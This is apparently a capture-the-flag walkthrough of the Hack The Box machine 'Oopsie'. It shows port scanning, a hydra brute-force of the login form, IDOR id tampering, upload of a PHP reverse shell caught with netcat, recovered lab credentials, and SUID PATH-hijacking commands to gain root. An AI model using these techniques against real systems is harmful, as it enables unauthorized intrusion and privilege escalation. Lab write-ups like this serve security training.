# Enumeration
#### nmap 

# nmap -sV -sC -p- -T4 -oA oopsie opsie.htb                                                                  130 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-15 06:18 EDT
Stats: 0:00:10 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 42.25% done; ETC: 06:19 (0:00:12 remaining)
Nmap scan report for opsie.htb (10.10.10.28)
Host is up (0.17s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 61:e4:3f:d4:1e:e2:b2:f1:0d:3c:ed:36:28:36:67:c7 (RSA)
|   256 24:1d:a4:17:d4:e3:2a:9c:90:5c:30:58:8f:60:77:8d (ECDSA)
|_  256 78:03:0e:b4:a1:af:e5:c2:f9:8d:29:05:3e:29:c9:f2 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Welcome
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

## Web Application

#### Nikto
 

# nikto -h opsie.htb                       
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.28
+ Target Hostname:    opsie.htb
+ Target Port:        80
+ Start Time:         2021-09-15 06:20:43 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-10944: : CGI Directory found
+ OSVDB-10944: /cdn-cgi/login/: CGI Directory found
+ OSVDB-3233: /icons/README: Apache default file found.
+ 10216 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2021-09-15 06:36:11 (GMT-4) (928 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

#### Gather Intel
Found admin email at the bottom of the page:
[email protected]

#### Dirbuster:
Found login page at /cdn-cgi/login/index.php:

![[Pasted image 20210915134710.png]]

#### THC-Hydra
Bruteforcing the admin email account on the cgi login form:

# hydra -l [email protected] -P /usr/share/wordlists/rockyou.txt opsie.htb http-post-form "/cdn-cgi/login/index.php:username=^USER^&password=^PASS^:F=Login" 

MEGACORP_4dm1n!!

# Reverse Shell
We're presented with an authenticated page which contains uploads. However, we cannot reach that page as we are unrpviliged :

![[Pasted image 20210915163835.png]]

I access accounts page and notice an id variable which could be changed to show another user by its id.

![[Pasted image 20210915164539.png]]

I use intruder to bruteforce the ids by inserting a thousand numbers from 1 to 1000 and found a super user at 30: 

![[Pasted image 20210915164700.png]]

I access `http://opsie.htb/cdn-cgi/login/admin.php?content=uploads&action=upload` then I change the request with the id and username of super user from within burp. Then generate the burp request within the browser and receive access to the uploads where I upload a php reverse shell which was denied upload but I caught the request again and changed the id and the username to super user again and the file was uploadded.

Next, setup netcat:

 # nc -nvlp 1234

and curl the file from /uploads:

# curl http://10.10.10.28/uploads/php-reverse-shell.php

# Privilege Escalation

Found robert's credentials in website's files within login.

www-data@oopsie:/var/www/html/cdn-cgi/login$ cat db.php
<?php
$conn = mysqli_connect('localhost','robert','M3g4C0rpUs3r!','garage');
?>

as robert, his group is called bugtrack i found a file called bugtrack in /usr/bin/ that is with setuid and owned by root. checked its strings and found it uses cat. gonna try to poison the path..

![[Pasted image 20210915192101.png]]

-----------------------------------------
 

1. Files with SUID set on.
    1. find / -user root -perm -4000 2>/dev/null
2. Investigate the type of file it is:
    1. file /usr/bin/bugtracker
3. Investigate the contents of the file and try to understand what it does:
    1. strings /usr/bin/bugtracker
4. Open the file to see what it does:
    1. it uses cat to dump contents of file
5. Create a new file called "cat" in a write-able directory and add to its contents /bin/bash
    1. echo '/bin/bash' > cat
6. Change cat's permissions to 777
    1. chmod 777 cat
7. See what is the current directory where the 'cat' file exists and export it:
    1. pwd
    2. export PATH=/home/robert:$PATH
8. Check if the PATH is exported correctly:
    1. echo $PATH
9. Run the vulnerable file:
    1. /usr/bin/bugtracker
    2. whoami: root